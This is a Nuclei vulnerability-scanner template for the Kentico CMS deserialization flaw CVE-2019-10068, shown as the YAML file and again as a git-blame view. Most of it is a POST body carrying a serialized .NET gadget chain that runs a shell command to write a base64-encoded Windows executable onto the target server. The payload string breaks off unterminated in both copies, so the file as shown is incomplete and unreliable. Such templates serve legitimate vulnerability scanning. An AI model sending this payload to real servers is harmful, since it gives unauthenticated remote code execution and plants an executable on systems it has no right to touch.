nuclei-templates/cves/2019/CVE-2019-10068.yaml

id: CVE-2019-10068

info:
  name: Kentico CMS Insecure Deserialization RCE
  author: davidmckennirey
  severity: critical
  description: |
    Searches for Kentico CMS installations that are vulnerable to a .NET deserialization vulnerability that could be exploited to achieve remote command execution. Credit to Manoj Cherukuri and Justin LeMay from Aon Cyber Solutions for discovery of the vulnerability.
  tags: cve,cve2019,rce,deserialization,kentico,iis
  reference:
    - https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/
    - https://packetstormsecurity.com/files/157588/Kentico-CMS-12.0.14-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10068
    - https://github.com/rapid7/metasploit-framework/pull/13107
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2019-10068
    cwe-id: CWE-502

requests:
  - method: POST
    path:
      - "{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500

      - type: word
        words:
          - 'System.InvalidCastException'
          - 'System.Web.Services.Protocols.SoapException'
        part: body
        condition: and
Update CVE-2019-10068.yaml 2021-04-22 15:59:09 +00:00			`id: CVE-2019-10068`

Add Kentico CMS Deserialization RCE (CVE-2019-10068) 2021-04-22 02:57:28 +00:00			`info:`
Update CVE-2019-10068.yaml 2021-04-22 15:59:09 +00:00			`name: Kentico CMS Insecure Deserialization RCE`
Add Kentico CMS Deserialization RCE (CVE-2019-10068) 2021-04-22 02:57:28 +00:00			`author: davidmckennirey`
			`severity: critical`
			`description: \|`
			`Searches for Kentico CMS installations that are vulnerable to a .NET deserialization vulnerability that could be exploited to achieve remote command execution. Credit to Manoj Cherukuri and Justin LeMay from Aon Cyber Solutions for discovery of the vulnerability.`
Update CVE-2019-10068.yaml 2021-04-23 09:06:58 +00:00			`tags: cve,cve2019,rce,deserialization,kentico,iis`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Add Kentico CMS Deserialization RCE (CVE-2019-10068) 2021-04-22 02:57:28 +00:00			`- https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/`
			`- https://packetstormsecurity.com/files/157588/Kentico-CMS-12.0.14-Remote-Command-Execution.html`
Update CVE-2019-10068.yaml 2021-04-23 09:06:58 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2019-10068`
Update CVE-2019-10068.yaml 2021-04-23 09:08:40 +00:00			`- https://github.com/rapid7/metasploit-framework/pull/13107`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2019-10068`
			`cwe-id: CWE-502`
Add Kentico CMS Deserialization RCE (CVE-2019-10068) 2021-04-22 02:57:28 +00:00
			`requests:`
			`- method: POST`
remove trailing spaces 2021-04-22 03:06:29 +00:00			`path:`
Add Kentico CMS Deserialization RCE (CVE-2019-10068) 2021-04-22 02:57:28 +00:00			`- "{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"`
			`headers:`
			`Content-Type: application/x-www-form-urlencoded`
			body: "stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
remove trailing spaces 2021-04-22 03:06:29 +00:00
Add Kentico CMS Deserialization RCE (CVE-2019-10068) 2021-04-22 02:57:28 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 500`

			`- type: word`
			`words:`
			`- 'System.InvalidCastException'`
Update CVE-2019-10068.yaml 2021-04-23 09:06:58 +00:00			`- 'System.Web.Services.Protocols.SoapException'`
			`part: body`
			`condition: and`